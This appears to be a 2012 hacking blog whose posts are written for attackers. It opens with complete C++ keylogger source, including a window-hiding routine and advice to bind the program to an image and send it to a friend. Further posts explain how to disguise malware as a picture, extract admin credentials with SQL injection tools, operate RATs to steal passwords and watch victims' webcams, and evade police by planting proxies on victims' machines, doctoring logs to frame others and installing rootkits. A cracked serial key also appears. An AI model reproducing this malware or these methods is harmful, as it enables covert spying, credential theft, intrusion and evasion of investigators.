Advertisement

Saturday, June 30, 2012

Learn to create Keylogger using C++

Learn to create Keylogger using C++

Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++. Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
Compile the Code(Ctrl+F9)




Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.




bind the exe file with image or any files and send it to your friend.

How Hackers can Track your Mobile phone with a cheap setup !

How Hackers can Track your Mobile phone with a cheap setup !

How Hackers can Track your Mobile phone with a cheap setup !




Cellular phones have become a ubiquitous means of communications with over 5 billion users worldwide in2010, of which 80% are GSM subscribers. Due to theiruse of the wireless medium and their mobile nature, thosephones listen to broadcast communications that could reveal their physical location to a passive adversary.

University of Minnesota researchers found a flaw in AT&T and T-Mobile cell towers that reveals the location of phone users. The attack, described in a Research paper (Click to Download Pdf), is most useful for determining whether a target is within a given geographic area as large as about 100 square kms or as small as one square kilometer. It can also be used to pinpoint a target's location but only when the attacker already knows the city, or part of a city, the person is in.

Ph.D. student Denis Foo Kune says, “Cell phone towers have to track cell phone subscribers to provide service efficiently. For example, an incoming voice call requires the network to locate that device so it can allocate the appropriate resources to handle the call. Your cell phone network has to at least loosely track your phone within large regions in order to make it easy to find it“.

The messages contain I.D. codes. In order to match the codes to the cell phone number, researchers called the phone three times. The code that appeared three times in the same time period in which researchers were listening in is most likely the code of the cell phone.“From there we can use that I.D. to determine if you’re around a certain area or if you’re on a particular cell tower,” he said.

The process requires a feature cellphone and a laptop, running the open-source Osmocom GSM firmware and software respectively, along with a cable connecting the two devices. It also uses a separate cellphone and landline.





The attackers use the landline to call the target's cellphone when it's located near the same LAC as the equipment and use the laptop output to monitor the broadcasts that immediately follow over the airwaves to page the target phone.


The implications of this research highlight possible personal safety issues. The group explains their work in a recently presented at the 19th Annual Network & Distributed System Security Symposium and was titled “Location Leaks on the GSM Air Interface”. The group has also contacted AT&T and Nokia with some low-cost options that could be implemented without changing the hardware

Tuesday, June 12, 2012

Hide any file inside a picture!

  

Hide any file inside a picture!



Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain
1) Create your virus. We shall call it 'server1.exe' for now.



2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.



3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to:
http://www.mediafire.com/?igjy4dnn0zb< This will be caught by your AV as "Binder/Kit". It is not a virus, it is a binder than is not undectable. If you don't wish to use it, that's fine, find your own.

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.



5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.



.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from this link:
http://www.mediafire.com/?th53hd2bz7vttd2

New serial:

Name: Johny Khan
CODE:
HP4ANyamVnhPkJUTTsOx2CdPhAyLTMSZiXxkNERW
KAwkZC+a6+sTipI7MMPyhJam0jdUttMT4Ebo9USN
o9IcmHB9FGrgYIeDPhW7WujYCM1s/bpe7hzoE5tj
RKphe5N1gew6I1BDJ37EMijaO+x0ROUw/YUbXOjv
V1ZeSKDFqlo=




7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.



8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.



9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.


I have never come across a tutorial that explains how to do this, and found this out after hours of online searching.

SQL Injection Complete Tutrorial

SQL Injection Complete Tutrorial

SQLI Expliot Scanner :
How To Use:
* Select The Google Dork By Using "All Dorks" Option In Left Panel.
* Select Your Choice PHP,ASP,SQL,.Etc
* Select The " Searchqu" From Dropdown List Box.The Default Options is "Google API"
* Select 500 In Max. The Default Is 300.
* Now Start The Search By Clicking Scan Button.
Download Link : http://hotfile.com/dl/136362969/f892439/Poison.zip.html

Havij :
Here I will be using a popular and my personal favourite SQLi tool Havij.

Let us now understand how this tool works. The tutorial can be used for any SQLi tool as the basic functioning is same for all. First thing you need to do is find a vulnerable site.
You can use blind SQL injection technique to figure out weather a site is vulnerable or not.
To check a website for vulnerability, you will first have to reach to a page that accesses the database and is of the form : www.site.com/product.php?id=23

Now simply add an apostrophe( ' )to the end of url and press enter. If the website replies with an error then it shows that the website is vulnerable to SQL injection. Look at the url in the following image( sorry for the over editing of image but it was really needed) . Notice the ' at the end of url and also the error responded from the database.

The error will look something like this : Warning: mysql_num_rows(): supplied argument is not a valid MySQL


So now that we have a vulnerable site for testing, we will now move ahead with using Havij and try to discover admin details of the website. In fact we can dig out every detail from the database using havij. Let us see how.

1. Start Havij and copy the url in TARGET address.( the same url which we used to test for sql injection vulnerability but without ' ).

2. Click on the ANALYZE button and wait for Havij to discover the database files for you.

3. At the bottom of the Havij terminal you will see the search progress.

4. Once a database is found, you can click on TABLES tab to view the available tables.

5. Then Click On "GETDBs" Button in Tab.After The Scan a Table Will Comes Namely "Information Scheme" If this Exists That site is Able to Hack Easily Otherwise You Want to Guess The Tabels.

6. Dont Tick The "Information Scheme"

7. Now Click "Get Tables".After Scan Completed.You Will Get All Tables in That Database Search For Admin,tbl_admin,Adminusers,users,......

8. If Admin Table is Found Make a Tick and Click Get Column.After Scan Completed You Will Get the Columns in That Tables.

9. You Will Get Columns Like This : "ID,User,Password" [Eg Only]

10. After selecting the various columns, click on GET DATA to get the values stored in the columns.
You can see in the figure how Havij has successfully retrieved the admin login details for us.

How To Find Admin Page :

1. In Some Site it is Easy For Example www.site.com The Admin Page is www.site.com/admin [Not For All But Try This Keyword]

2. In Havij Click On Find Admin Tab And Enter the Site URL It Will Find Admin Page For Possible Sites.

3. You Can Scan The Website With Acuntix Web Vulnerability Scanner.

Make a Comments Below....

Ip grabber !

Ip grabber !

This software will grab a victims IP address when you give them a link.
Want to attack someone but don't know their IP? Give them a link to click and instantly get their IP Address.

1. Simply give the slave a link to your ip, such as http://145.323.111.231 to gain their IP.
2. This software uses port "80".
3. You will need to port forward port "80" to use this software.
4. Use tiny url or another url shrinker to mask your IP address and make it less suspicious.

Click image for larger version. 

Name: grabber.jpg 
Views: 9 
Size: 12.1 KB 
ID: 39


Download Here:- http://www.mediafire.com/?qp9xezfq5z2ypgs
Hacking is not a crime. Its kind of Art !

40 Best Hacking Tools

                                    40 Best Hacking Tools

Hey everybody, this is a package I found, this package contains, practically everything you need for hacking, using these tools will not make you a hacker. But there are a couple of things I got to say before you go off using these tools. This package contains, port scanners, bug scanners, and other types of scanners, virus gens, worm gens, flooders, nukers, trojans, password crackers for multiple type of logins, irc hacks, msn hacks, packet grabbers, lan hacks, web browsers, and remote tools. These programs will not harm your computer but they will set off your firewall, reason, because they connect to outside networks to operate, and require online activity to function, so these programs will try to connect to outside networks to function, therefore setting off your anti virus or firewall, you must disable your firewall or anti virus while using these programs, if a tool is missing a file, that is because it was coded in visual basic and is missing a file that it needs to function, so ussually it will say what file your missing like, for the myspace hack it will say your missing some files mayb winsck.ocx, you would need to google it, and than download it, and than save it in C:\Windows\System32 . If you have anymore questions about these files, please ask.
Tools It Got :
IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
BrutusAE2
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
VNC Crack
Mutilate File Wiper 2.92
Hamachi 0.9.9.9
pbnj-1.0


Download Here
http://rapidshare.co...ol_Set.zip.html

Friday, June 1, 2012

How Not To Get Caught while HACKING !

How Not To Get Caught while HACKING !

I think this must be read before starting or thinking of hacking. Big ups Evox


How Not To Get Caught

I think one of the most unclear areas to the up and coming hacker is how to avoid being caught when penetrating systems and networks. I've read and heard many very misinformed myths on this subject, and I've seen more than a few people get in a lot of trouble by making dumb mistakes.

I should take a second here first to go over something. I'm not promoting illegal activities or saying anybody should go out and do anything illegal or damaging. I'm just trying to be informative.

Contents


1 Things you should not do
1.1 Use AOL, MSN, or any small ISP (assuming you're doing this from your home).
1.2 Make any operational changes to the compromised computer(s)
1.3 Leave a calling card
1.4 Use Proxies
1.5 Use automated exploit scanning tools
1.6 Tell anybody about what you're doing or have done
1.7 Attempt unrealistic methods of intrusion
1.8 Give yourself a user account
1.9 Do it from a public computer
1.10 Write things down or print things off
1.11 Respond to any odd communications you get regarding your target
1.12 Use mind altering drugs or hack when you've had a lack of food or sleep
2 Stuff you should do
2.1 Your Environment
2.2 Proxies - Revisited
2.3 Data Protection
2.4 Wireless
2.5 Using Exploits
2.6 Hacking Web Apps
2.7 Dealing with Logs
3 Hiding out on a Linux System
4 Hiding out on a Windows System


Things you should not do
There are some things that you should avoid doing at all costs if you don't want to get caught. I think it's important to go over these first because there are a lot of common myths and falsehoods that should probably be cleared up before I go on and explain good ways to protect yourself. Keep in mind, these are things you _shouldn't_ do.

Use AOL, MSN, or any small ISP (assuming you're doing this from your home).
If you do stuff from home, or even just do research of some kind from home, you should avoid MSN, AOL, and smaller "home-town" type ISP's. AOL and MSN watch their customers very closely for any activity that might indicate you are involved in breaking into a system and may call the cops, turn off your internet, or a multitude of other things. Smaller ISP's tend to do the same kind of thing. Citation needed

Make any operational changes to the compromised computer(s)
When you compromise or probe a system you should not do anything that has a good potential of negatively impacting the performance of that system. People will notice if something stops working right or starts working slower than normal, and will investigate the reason behind it.

Leave a calling card
Don't leave any sort of calling card that'll tip someone off to your presence. This includes defaced web pages, deleted system logs, logs edited in ways that aren't believable, etc. This is again, because it lets the target know that someone has been messing with things.

Use Proxies
This mostly applies to the proxies found on public proxy lists, but it should be held as a general rule. Do not use proxies to try to mask where you are connecting from. Most proxies keep logs of who uses them and for what. If your mark realizes something is going on they can probably just get the party responsible for the proxy to release the relevant logs. This isn't to say that proxies should never be used. They just should not be relied on. Ideally, any proxy you use should be one you are sure does not log anything, or one which you can access and delete log entries related to you.

Use automated exploit scanning tools
Don't use programs like X-Scan, Nessus, Saint, SuperScan, Languard, or anything else like that to get info about targets. These programs tend to check for every possible thing which could be wrong with a given system, which will generate a lot of error messages on your target's system and fill their logs, which is a pretty good indication to them that someone is attacking them. Such programs also tend to trigger intrusion detection systems like Snort.

Tell anybody about what you're doing or have done
The fewer people who know, the better, because then there are less people who can rat you out or let it slip. Avoid working in groups if possible.

Attempt unrealistic methods of intrusion
Don't try to do stuff like use IIS exploits against Apache, or IA32 shellcode on a computer with a PPC processor in it. These are sure-fire tip offs to someone that something is going on, and will also trigger most IDS devices. Along with this, you should avoid using automated password guessing programs because they'll cause you the same kind of trouble, and you probably won't gain anything.

Give yourself a user account
Avoid giving yourself a user account on a target system. If you can, use an existing account or access the system using a method that doesn't require authentication.

Do it from a public computer
Although it might be tempting, you shouldn't use public computers for any kind of hacking. While it does grant you relative anonymity, you can't be sure that someone won't walk past and see what you're doing, that there are no cameras around, or that the machine doesn't log what you use it for.

Write things down or print things off

Keep stuff on computer where you can encrypt it and hide it from prying eyes. Don't write stuff down or print it off because then someone might find it laying around. Plus, papers found with you can be used as evidence while most text-based computer documents can't be.



Respond to any odd communications you get regarding your target
This might sound obvious, but don't respond to any communications you get from anyone regarding your target. If someone contacts you about your target then cease all activity right away.



Use mind altering drugs or hack when you've had a lack of food or sleep
All of these can cause you to make stupid, stupid mistakes.



Stuff you should do

Enough with things you should avoid doing, and on to things you should do. This section is broken up into little segments about different topics.



Your Environment
Something that is a lot more important than you would think is the environment in which you work. Make sure you are relaxed, have access to some place comfortable to sit, and are not rushed. Avoid recurring distractions like the telephone, and turn off things like the TV or the radio. Music is good, but don't listen to music that makes you feel particularly rushed, excited, or tense. Turn off any messaging programs or anything like that.

The idea is to make it so you can completely focus on the task at hand without feeling rushed or uncomfortable. If you maintain a relaxed state of mind and body you will make less mistakes and will think through your actions more carefully. It's really easy to forget what you're doing and then make a mistake later if you get pulled away from the computer by the phone or something. Take frequent brakes and sit down and relax. Also, make sure you have plently of sleep, food, and what not so you're brain is working well. Needless to say, save the cannibus, alcohol. or whatever else for the victory dance, hehe.



Proxies - Revisited
Yeah, I said not to use proxies. That's because it's easier to tell someone not to do something than to explain to them the right way to do it. So, this is the "right way". When it comes to proxies your best source of them is yourself. You should use proxies you have set up on other people's machines. There are many pieces of software available online which will act as a SOCKS proxy if you install it on someone's computer.

Register an account with a free dynamic DNS service like dyndns.org and then install proxies on home machines, and use the dynamic DNS services so you can always find the machines you've made into proxies. The advantage of this approach is that individual home users are a lot less likely to monitor their computers (many home PC's are part of a bot net anyway), and you don't have to worry about logs.

It's best to use proxies which support encryption so the traffic sent between the proxy and your machine can't be sniffed by anyone in between.

Also, on the topic of proxies, it should be noted that any program can be used through a proxy if you take the correct measures. Two pieces of software you should look into are tsocks and proxychains. Both of them can take all of the TCP I/O of a program and send it through a chain of proxies. You can even use them to do anonymous portscanning and the like. About the only thing they don't work well with is FTP, due to the way FTP connections work.

If you have the time to do so you should check out the Tor project (http://tor.eff.org/), which is a decentralized, encrypted network of proxies which anyone can use to mask the source of a connection. It seems to work prety well, except that connections over Tor have a higher latency than connections without it.

Data Protection
Protect the data on your computer(s) from prying eyes. Don't use some kind of stupid method like a commercial crypto-disk software which probably has a backdoor in it. There are better ways. One of the best ways I have seen is to use the cryptodisk function found in the Linux kernel. Basically, you can make a image file which can be mounted as a file system (with the correct password). When it's not mounted the data is encrypted using any algorithm you like (anything from 3DES to AES or Twofish). There's a good tutorial on how to set this up here: http://www.tldp.org/HOWTO/Cryptoloop-HOWTO/

If you're not able to take that route, using PGP/GPG is a good idea. GPG is an open source encryption program that uses a public key architecture and is pretty much the de-facto standard for encrypting documents. It's a good idea to encrypt any saved logs or data using it. If you're using a system with it installed (any *NIX) open a command prompt, run gpg --gen-key and follow the directions. It's a very useful piece of software.

As far as hiding and encrypting data it's a good idea to avoid any commercial software and the methods of encryption used by programs like Winzip and Winrar. In short, don't use any application-specific method of protecting your data. Don't rely on the password protection of Word documents, for example.

Also, it's not a horrible idea to have some kind of plan in place to destroy all of your data very quickly in the event of a raid or something like that. Granted, you probably won't ever have to actually use the plan, but it's like hacking insurance. Better safe than sorry. It's best to dispose of magnetic disks like floppies and hard drives using very strong magnets or very high heat. Heat is best, since the media will warp and expand. One thing I used to do was keep a coffee can with a magnet taped to the lid, and keep floppies in the can. That way knocking over the can would erase the disks.

Hiding your data somewhere no one will look is a good idea as well. Some HP network printers use a version of DOS which will allow you to store files on the flash drive in the printer, for example. Who is going to look for your stored files on a printer? All the better if they're encrypted too.



Wireless

The spread of wireless internet access has made it a lot easier to hide one's identity on the internet. If an attack is made from a network with an attached wireless AP, it's almost impossible to know who did it. However, if you choose to go this route you need to take special precautions.

Obviously, don't be suspicious, and don't get yourself on camera. Also don't use programs like Net Stumbler to find networks. Use a passive tool like Kismet, or just put your card in monitor mode and use Ethereal. Do NOT use a Windows computer for this. Windows loves to broadcast all sorts of identifying data all over the place, and you don't want that on someone else's wifi net. In fact, make sure any programs which automatically connect to anything online are turned off so you don't make any more traffic than you have to. It's also a good idea to change the MAC address of your wifi card using a program like macchanger or travesty. You can change the reported MAC address in Linux easy enough with ifconfig.

If you can, you should get into the AP and delete logs related to your computer as well. That way no one even knows anyone out of the ordinary was using the network. Otherwise you might suddenly find that networks you frequent become closed.



Using Exploits
Probably one of the most effective ways into a system is to exploit a vulnerability in a piece of software installed on that system. It could be an exploit for anything from an anti-virus program, to a web server, to something as odd as a word processor. Such exploits are plentiful, available all over the internet, and most systems have at least one piece of software installed which is vulnerable to an exploit. All of this makes using known exploits very attractive. Well, before you happily go and use someone else's exploit code there are some precautions you should take.

First of all, most of the time when a vulnerability is discovered one to two pieces of code are released for exploiting it. In most cases these pieces of code send some kind of distinguishing data to the target, so such data is often added to the signature lists of IDS software very quickly. Exploits which cause something to listen on a port are usually added to IDS software pretty quickly too, because they tend to use the same port all the time. So, if you just plan to use someone else's un-modified code, you probably shouldn't. The best practice is usually to write your own code that exploits a known vulnerability in a fashion that won't set off too many alarms. If you don't have that level of skill, you can always try modifying someone else's code.

Most exploits have a section somewhere in them called the "payload" which is basically the instructions the exploit has the target run. Most of the time "shellcode" is placed here, which is a hashed and obfuscated list of command line instructions. Again, most of the time the goal of shellcode is just to get the remote system to bind a command shell to a given port. In many cases you can simply remove the shellcode in an existing exploit and replace it with your own. Tools like the Metasploit Framework can help you generate code to your specs.

Also, the best practice as far as exploits go is to use or find one that not many people know about at all. If an exploit isn't public knowledge then most people will not know what to look for, and most IDS devices won't flag the usage of it.



Hacking Web Apps

A common way into a server is to exploit something wrong with a web-based application like forum or gallery software. This is actually a very good way into a server that carries a lower risk than you might think. If you do this sort of thing it's best to do it during peak hours because so much traffic will already being hitting your target that yours will probably go unnoticed. Web server log files get very large and most people never read through them unless they think something's messed up or not working right. Furthermore, most *NIX based systems use logrotate to delete old log files, so chances are, your logs will be deleted anyway after a little while. Some systems are even configured so that log files are "rotated" once they reach a certain size.

However, you are still vulnerable to detection by intrusion detection software. Thus, you should take two precautions. The first is to use a randomized chain of proxies so that your requests don't all appear to be coming from the same IP. Multiproxy (for Windows) and proxychains (for Linux/UNIX) can do this for you. The second is to use SSL (https://) if you can. SSL encrypts all data between you and the web server to prevent people from snooping. It also prevents IDS software from seeing the data you're sending the server.



Dealing with Logs
How to deal with system log files is a hotly debated subject. Generally, you should never just delete all the logs on a system. Missing log files are a huge tip off that something is wrong. Also, you should always check to see if the logs on a system are being saved somewhere other than the usual place. On a Linux or UNIX system you'll probably want to take a look at /etc/syslog.conf and look to see if logs are being logged to any remote hosts. Windows doesn't have a built in way of logging to a remote computer (at least, not that I am aware of), so it's harder to tell if something like that is set up on a Windows box.

It is a good idea to edit logs. However, you have to be careful and pay attention to what you're doing. You probably shouldn't just delete all evidence that you ever touched the system. Rather, you should alter the evidence to make it look like someone else did. For example, say you break into a server in a college. It wouldn't be a bad idea to alter and change all instances of your IP to an IP somewhere on the same IP block as the student dorms. A plausible explanation is always better than no explanation. People won't look as hard for an answer if there's already an apparent, obvious one in front of them.

On *NIX systems there's a file called /var/log/lastlog which keeps track of the last time each user logged in and from where. Generally, when a user logs in it will show them the last time they logged in. Deleting lastlog is a bad idea, and there is no good way to edit it. One good way to deal with it is to secure shell to localhost and log in again. Most people won't really think anything of it if the server says the last time they logged in was from TTY1 or something. Now, yeah, an admin will know something is up, but if the account you used belongs to someone less experienced they'll just ignore it and assume the admins must have been fixing something.



Hiding out on a Linux System
If you break into a Linux system there are some things you should check for before you poke around too much. You should probably check to see what modules are loaded (lsmod) and look for anything odd which might indicate you're inside a virtual machine (might be a honeypot). Another good way to check for that is to cat /proc/cpuinfo. If it's vmware cpuinfo will say so.

Also, you should see if process accounting is installed and enabled. Look for the executable accton, which is typically located in /sbin. Look for any kind of integrity software as well, including chkrootkit, rkhunter, tripwire, samhain, integcheck, etc. If you do find software which will detect your presence you should not disable it. Rather, see if you can reconfigure it to ignore you.

Generally, because of the way a Linux system logs actual log ins you'll probably want to install some sort of rootkit or back door to let yourself in later. The best sort of rootkit for this sort of thing is one that's not readily detectable. Good ideas are replacing ssh with a patched version which does not log your logins, or replacing /sbin/login with a version that doesn't log you. There are plenty of rootkits out there which you can get ideas and the like from.

There are also a lot of more obscure ways of gaining access, including programs which send command over ACK packets, ICMP, or HTTP. Such programs are very useful since a firewall won't normally think anything of them. Also, of note here are netcat and the GNU version of awk, both of which can be used to make a remote shell you can connect to. These are nice because both of them are usually installed on most Linux systems.

Also, a final note on rootkits. Do not compile them on your own system and them upload them, especially if they replace vital system files on the target system. If your system happens to have different versions of a required library or something of that nature the rootkit might cause the "patched" version of /sbin/login or some other program to not even run, which that is a first class way to let someone know something is wrong.



Hiding out on a Windows System
Windows is a lot easier to hide on. There are plenty of good programs which will dodge antivirus software and disable logging of your connections. Also, if the target system uses NTFS you can use NTFS file streaming to hide files on the system (the book Hacking Exposed talks about how to do this).

As far as backdoors and the like go, you should avoid using traditional trojan horses. They are easy to detect and usually have a lot of functionality issues. Installing something like tightvnc, turning on Remote Desktop/Terminal Services, or something like that is the way to go. Most Windows servers do not have the logging facilities to notice a change like that, and it's easy to hide such changes or software installs if you use a rootkit like the one that comes on those CD's Sony is distributing right now (hides any file where the name starts with $sys). People tend to expect a little oddness and quirkiness out of Windows, so you have more leeway for installing backdoors.

Honestly though, there aren't many reasons to want to break into a Windows system. They do make excellent members of a list of a proxies.

Post Status Updates in Blue Color on Facebook .Lets Try it Guys !!!

Post Status Updates in Blue Color on Facebook .Lets Try it Guys !!!

Hai brothers !!!
I am going to show u to Post Status Updates in Blue Color on Facebook.
Just follow these steps !!!!


1. Go to Facebook.com and Login with your Credentials.

2. Now go to update status link and paste below code, and change the text saying YOUR TEXT HERE with your own text you want in blue color like.



@[1: ]@@[1:[0:1: Your Text Here ]]

How to become annonymous!! i HOPE this is useful :)

How to become annonymous!! i HOPE this is useful :)

Hello everyone.

Being anonymous on the internet is important because as we all know, this is HACKERS and there are lots of people who do black hat shit in here. So to help them, I am going to talk about how to be anonymous, how to protect your data, and how to remove all the evidences.

THE THINGS YOU NEED

A computer.
A brain.

PROGRAMS REQUIRED

1. TrueCrypt. This is a really essential program if you want to store your data. This program creates a file for you, and to open that file, you type a long password. This folder cannot be opened by any other people that doesn't know the password.

To download TrueCrypt, click the link below:

http://www.truecrypt.org/downloads

For those who are having difficulties using it, watch this video:

http://www.youtube.com/watch?v=UdVrSl9AjtU

2. Deep Freeze. This is a program that deletes everything after you restart your computer. I would definitely recommend you to download it.

To download Deep Freeze, click the link below:

http://www.faronics.com/en/Products/Deep...ation.aspx

For those who are having difficulties using it, watch this video:

http://www.youtube.com/watch?v=raYLv4Th5vI

3. TMAC. This is a program that protects your unique MAC address. MAC addresses are unique identifiers that can lead the cops onto you if you have done something wrong. TMAC is a beast when it comes to protection, so I really recommend this.


To download TMAC, click the link below:

http://www.technitium.com/tmac/index.html#download

-

Okay now these programs were about keeping your computer safe. Let's move on to internert anonymity.

1. Socks5/Proxies. I don't recommend you to find these from the internet for free, the free ones are so fucking slow and really annoys me when they don't work. I highly recommend http://www.vip72.org if you are going to do something illegal. Their service is fast, cheap and stable.

You can buy Socks5/Proxies from the address below:

http://www.vip72.com
http://www.vip72.org
http://www.vip72.asia

You can find free Socks5/Proxies by clicking the links below:

http://www.lmgtfy.com/?q=free+socks5
http://www.socks24.org

You can check your Socks5/Proxies from the website below:

http://www.sockslist.net/check

2. VPN. You should find yourself a VPN that doesn't store any logs. We don't want the authorities to get access to the websites you visit right? In my opinion, you should pay for a VPN. That's upto you of course.

You can use some of the VPN's below:

http://www.secretsline.biz - You can use DoubleVPN with this.
http://www.happy-vpn.com
http://www.swissvpn.net

3. RDPs. These are the addresses that you use to surf. For example, if you watch child porn using a RDP, and if anything happens, the real person who owns the RDP gets caught. There is RDP sellers online, you must find them. I don't know if they sell it on ISA, but there are lots of sellers on forums that are carding related.

4. Public Wirelesses. You should use them if you are going to attempt something illegal. Or just learn how to crack wirelesses and use your neighbors wireless. That works too.

So that's all about protection. Now I will tell you how you can use these.

First of all, format your computer. Download your drives and after you have downloaded them, download the programs below:

Firefox
TrueCrypt
TMAC
Deep Freeze

After you format your computer, install the programs above. Set Deep Freeze, and then restart your computer. It will delete everything after you set Deep Freeze. Now start browsing freely, everything will be lost after you restart your computer anyways.

Store every single important information in your USB stick, if something happens and cops break your door, you should be able to get rid of all the evidence. If anything like that happens, just restart your computer and microwave your USB stick.

If you are going to do something blackhat, make sure that the computer you use doesn't carry any of your personal information.

Well, that's all I can tell about security and anonymity. Don't forget, you shouldn't do anything that is associated with your identity. You have a life to live, don't just waste it by getting caught. Make the cops job harder.

Thanks for reading,

RAT'ing Basic Tips (For absolute beginners)

RAT'ing Basic Tips (For absolute beginners)

This is not a tutorial, this is just a few absolute basic tips for just-starters

I decided to post this, as I've seen many new RAT'ers asking very basic questions, and taking up forum space.
NOTE: If someone has already posted something similar to this, then my bad. Just wanna help.

1. File Viewing Issue:
If you already have a slave, and you're looking at their files through your RAT, and see nothing. (I.E.- You are looking at their saved PW, the option under remote functions or something. And you see nothing? Simply, right click in the blank space, then click refresh. Most RAT's you will see something saying loading files, unpacking files, or something of the nature. If you see that it says something that means done, and there's no PW's showing up, then your slave doesn't have any saved PW's to steal.

2.Logs Issues (similar to No.1) -
If you don't see any logs, or keystrokes under the key logger option, do the same thing as No.1. Just right click the blank space where the logs show up, and click refresh.

3. Disconnecting?
Sometimes when you attempt to connect to a particular slave, they might disconnect, and re-connect very quickly. Therefore, you might not be able to instantly view their webcam, use keylogger, or saved PW options. Just wait for their name to show back up in the online list, and do it again. (Depends on the RAT you're using, this could happen very often, or in some cases, very rarely.)

4. MAKE SURE YOU ARE RUNNING NO-IP, OR ARE USING YOUR VPN.
If you are not, the slave can easily trace your IP back to you, through the netstat command.

5. Webcam Issue:
I don't know for100% sure if every RAT does this, but I know at least a few do. But, if you're trying to view your slave's webcam, they will know at least half the time, because it shows up on their screen too. NOTE: Some victims have to allow webcam access, for you to view it. So when you try to connect to it, and it looks like its loading forever, it's usually because they are not accepting it. If they decline, it will close you out of the webcam option.

6. When downloading a slave's files,programs, etc
.
Make sure you're not downloading the shortcut, or at least, make sure you're getting the main file or program you want. (Example, don't download just the AIOHackTools.exe shortcut on their desktop, you need to find the main directory of the program. This is, of course, if the program has been installed.

7. SEARCH FIRST
:
If you're having problems setting you're RAT up, please use the search button, and make sure you're not just searching RAT every-time. If you have a specific problem, search it, but not with too much detail. Me, if I'm having problems, I just search "DarkComet problems" or "DarkComet error" or something of that nature.


8. Try Proxpn:
When setup fails you through countless attempts, just download proxpn. You won't need to forward ports, or even us No-Ip. Warning, if you only use the free version, you're broadband/internet will be very slow in most cases, it is highly recommended if you're going to use a vpn, to get a paid one.


Remember, this is not meant to be a tutorial of any sort, just a basic tips "guidelines" for people who've just started RAT'ing.

How to get into someones email

Angry How to get into someones email

Ok today we will be using the "Password Recovery Method". What this does is you are going to try to recover the password by typing in the victims security question.


What can I get with someones email?
Passwords, Personal Info and much more.

